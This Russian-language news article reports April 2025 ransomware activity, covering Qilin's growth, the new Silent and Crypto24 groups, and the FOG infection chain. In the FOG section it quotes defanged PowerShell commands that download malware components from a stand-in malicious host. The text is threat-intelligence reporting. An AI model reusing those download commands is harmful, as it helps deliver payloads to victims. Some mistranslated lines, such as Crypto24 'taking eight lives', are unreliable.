470 атак программ-вымогателей в 2025 году, Qilin остается доминирующим, за ним следуют Silent и Crypto24

В апреле 2025 года произошел заметный сдвиг в глобальной ситуации с программами-вымогателями: по всему миру было зарегистрировано 470 жертв, что на 29% меньше, чем в марте.

Несмотря на это количественное снижение, операции программ-вымогателей продолжают демонстрировать возросшую изощренность и стратегическую направленность, что свидетельствует о том, что субъекты угроз становятся более избирательными, а не менее активными.

Основной удар этих атак пришелся на производственный сектор, за которым следует отрасль информационных технологий, а основной географической целью киберпреступников остаются Соединенные Штаты.

Группа Qilin прочно зарекомендовала себя как доминирующая группа программ-вымогателей в этой меняющейся ситуации, зафиксировав значительный рост активности на 71,4% по сравнению с предыдущим месяцем.

5 ЛУЧШИХ ГРУПП ПРОГРАММ-ВЫМОГАТЕЛЬЩИКОВ 2025 ГОДА (Источник – Cyfirma)

Стремительный рост заболеваемости «Цилинь», число жертв которого подтверждёно на сегодняшний день составляет 72, свидетельствует о тревожной тенденции ускоренного наращивания возможностей и расширения инфраструктуры.

Другие известные группы, демонстрирующие значительный рост, включают Play с ростом активности на 75,9% и DragonForce с более умеренным ростом на 25%, что иллюстрирует динамичный характер текущей среды угроз.

Исследователи Cyfirma выявили несколько новых группировок программ-вымогателей, дебютировавших на ландшафте угроз в апреле 2025 года.

Наиболее заметными среди этих новых участников являются Silent и Crypto24, которые быстро зарекомендовали себя благодаря особым подходам к работе.

Внезапное появление этих групп совпало с неожиданным закрытием RansomHub, что говорит о возможном перераспределении технических талантов и ресурсов в экосистеме программ-вымогателей .

Группа вирусов-вымогателей Silent, запустившая свой сайт по утечке данных в конце апреля, отличилась уникальной операционной методологией.

В отличие от традиционных операторов программ-вымогателей, которые в первую очередь сосредоточены на шифровании, Silent утверждает, что отдает приоритет краже данных, нацеливаясь на ценную конфиденциальную корпоративную информацию, которую можно продать конкурентам или на торговых площадках даркнета .

Имея уже четыре подтвержденных жертвы, группа делает упор на конфиденциальность и анонимность, минимизируя объем зашифрованных данных, чтобы снизить вероятность обнаружения, и одновременно максимально используя рычаги воздействия за счет украденной информации.

Тем временем Crypto24 проявил себя с большей агрессивностью: с момента своего появления он унес жизни восьми человек по всему миру.

Эта группа, судя по всему, пользуется вакуумом, образовавшимся после ухода RansomHub, потенциально поглощая бывших партнеров, ищущих новые операционные платформы.

Сложная цепочка заражения вирусом-вымогателем FOG

Техническую сложность современных программ-вымогателей можно продемонстрировать на примере FOG, который использует многоэтапный процесс заражения, начинающийся с фишинговых писем , содержащих ZIP-архив под названием «Pay Adjustment.zip».

Этот архив содержит вредоносный LNK-файл, который запускает скрипт PowerShell («stage1.ps1»), отвечающий за загрузку дополнительных компонентов:

Invoke-WebRequest -Uri “hxxp://malicious-

domain[.]com/cwiper.exe” -OutFile “$env:TEMP\cwiper.exe”

Invoke-WebRequest -Uri “hxxp://malicious-domain[.]com/ktool.exe”

-OutFile “$env:TEMP\ktool.exe”

Invoke-WebRequest -Uri “hxxp://malicious-

domain[.]com/lootsubmit.ps1″ -OutFile “$env:TEMP\lootsubmit.ps1”

Цепочка заражения включает в себя инструмент повышения привилегий (ktool.exe), который использует уязвимость в драйвере iQVW64.sys, а также скрипты сбора данных, которые собирают сведения о системе и данные геолокации.

Перед выполнением программа-вымогатель выполняет проверки среды для обнаружения виртуализации, избегая песочниц, которые обычно используются для анализа вредоносного ПО.

После шифрования файлы получают расширение «.flocked», а также сбрасывается записка с требованием выкупа (readme.txt), содержащая сообщения политического характера.

Уникальной особенностью является то, что жертвам дается указание и дальше распространять вредоносное ПО — тактика социальной инженерии, которая отличает FOG от более традиционных операций по вымогательству.

Поскольку группы вирусов-вымогателей постоянно совершенствуют свою тактику и методы, организациям следует сохранять бдительность и внедрять комплексные меры безопасности для защиты от этих сложных угроз, которые не демонстрируют никаких признаков ослабления в 2025 году.

Источник — https://cybersecuritynews.com/